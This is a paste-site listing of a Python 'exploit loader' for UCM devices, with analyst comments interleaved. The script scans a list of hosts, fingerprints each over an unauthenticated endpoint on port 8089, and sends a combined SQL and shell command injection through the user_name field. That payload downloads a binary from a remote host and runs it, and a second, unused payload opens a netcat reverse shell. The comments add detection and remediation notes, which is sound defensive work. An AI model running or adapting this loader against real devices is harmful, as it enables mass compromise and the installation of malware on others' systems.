Merlyz

[EXPLOIT] UCM Exploit Loader

Oct 12th, 2020
  1. import os
  2. import re
  3. import sys
  4. import json
  5. import argparse
  6. import requests
  7. import threading
  8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  9. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  10.  
  11. class Loader(object):
          # Analyst summary: constructing Loader(adress) immediately runs infect() on that
          # one host (see __init__). The flow is: fingerprint the device with
          # action=getInfo, stop unless prog_version is below 1.0.19.20, then send
          # action=sendPasswordEmail with a crafted user_name value.
          # Defender view: both requests are POSTs to https://<host>:8089/cgi and carry
          # no credentials or session, so the endpoint is reached unauthenticated.
  12.  
  13.     def infect(self, adress: str):
              # Runs the whole probe-then-payload sequence against `adress` (host or IP).
              # Every failure path prints a '[-]' message and calls sys.exit(1).
  14.         url = 'https://' + adress + ':' + "8089" + '/cgi'
  15.         print('[+] Sending getInfo request to ', url)
  16.  
              # verify=False disables TLS certificate validation for this request.
  17.         try:
  18.             resp = requests.post(url=url, data='action=getInfo', verify=False)
  19.         except Exception:
  20.             print('[-] Error connecting to remote target')
  21.             sys.exit(1)
  22.        
  23.         if resp.status_code != 200:
  24.             print('[-] Did not get a 200 OK on getInfo request')
  25.             sys.exit(1)
  26.        
              # The body must begin with exactly '{ "response":' (find() == 0), otherwise
              # the host is treated as not being the expected device.
  27.         if resp.text.find('{ "response":') != 0:
  28.             print('[-] Unexpected response')
  29.             sys.exit(1)
  30.        
  31.         try:
  32.             parsed_response = json.loads(resp.text)
  33.         except Exception:
  34.             print('[-] Unable to parse json response')
  35.             sys.exit(1)
  36.        
              # getInfo discloses model_name and prog_version to an unauthenticated caller;
              # that disclosure is what makes the version gate below possible.
  37.         print('[+] Remote target info: ')
  38.         print('\t-> Model: ', parsed_response['response']['model_name'])
  39.         print('\t-> Version: ', parsed_response['response']['prog_version'])
  40.        
  41.         match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
  42.         parsed_response['response']['prog_version'])
  43.         if not match:
  44.             print('[-] Failed to extract the remote targets version')
  45.             sys.exit(1)
  46.        
  47.         major = int(match[1])
  48.         minor = int(match[2])
  49.         point = int(match[3])
  50.         patch = int(match[4])
  51.        
              # Version gate: anything at or above 1.0.19.20 is reported as unaffected and
              # skipped. Remediation read-out: by this script's own check, firmware
              # 1.0.19.20 or later is not targeted - confirm the fixed release against the
              # vendor advisory.
  52.         if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
  53.         and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
  54.         20):
  55.             print('[-] Unaffected version')
  56.             sys.exit(1)
  57.         else:
  58.             print('[+] Vulnerable version!')
  59.  
  60.         print("[+] loaded, %s" %(adress))
              # Payload stage. The user_name parameter combines a SQL-injection fragment
              # (' or 1=1--) with a backtick and ';'-separated shell commands, so the
              # request relies on the device passing this field to both a query and a shell.
              # Only `exploit` is sent; `exploit2` is built but never used by this script.
              # 1.3.3.7 looks like a placeholder for the operator's host - confirm before
              # treating it as an indicator.
              # Detection on the wire: POST /cgi with action=sendPasswordEmail whose
              # user_name contains a quote, backtick, ';', 'wget', 'chmod' or '${IFS}'.
              # Detection on the device: an outbound HTTP fetch, a file named arm6 under
              # /var/ with mode 777, and a process started as './arm6 UCM'.
  61.         try:
  62.             exploit = "admin\' or 1=1--`;cd /var/; wget http://1.3.3.7/arm6 ; chmod 777 arm6 ; ./arm6 UCM" #arm7
  63.             exploit2 = 'admin\' or 1=1--`;`nc${IFS}' + "1.3.3.7" + '${IFS}' + "1270" + '${IFS}-e${IFS}/bin/sh`;`'
  64.             resp = requests.post(url=url,
  65.         data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
  66.         except Exception as err:
  67.             print('[-] Failed to send payload')
  68.             sys.exit(1)
  69.        
  70.         if resp.status_code != 200:
  71.             print('[-] Did not get a 200 OK on sendPasswordEmail request')
  72.             sys.exit(1)
  73.        
  74.         try:
  75.             parsed_response = json.loads(resp.text)
  76.         except Exception:
  77.             print('[-] Unable to parse json response')
  78.             sys.exit(1)
  79.        
              # 'status' == 0 in the JSON reply is the only success signal checked; the
              # script never verifies that the injected commands actually ran.
  80.         if parsed_response['status'] == 0:
  81.             print('[+] Success! Clean exit.')
  82.         else:
  83.             print('[-] Something bad happened.')
  84.            
          # The constructor is the entry point: it is what the thread target below invokes.
  85.     def __init__(self, adress: str):
  86.         self.infect(adress)
  87.  
  88. with open(sys.argv[1], "r") as f:
          # Driver: sys.argv[1] is a text file with one target address per line. Each
          # line starts its own thread running Loader(address), with no limit on the
          # number of threads.
          # Defender view: this is list-driven mass targeting, so one source sending
          # getInfo probes to /cgi on port 8089 across many hosts in a short window is
          # the pattern to expect - presumably alertable at the perimeter; verify against
          # your own logs.
  89.     for item in f.readlines():
  90.         threading.Thread(target=Loader, args=(item.rstrip(), )).start()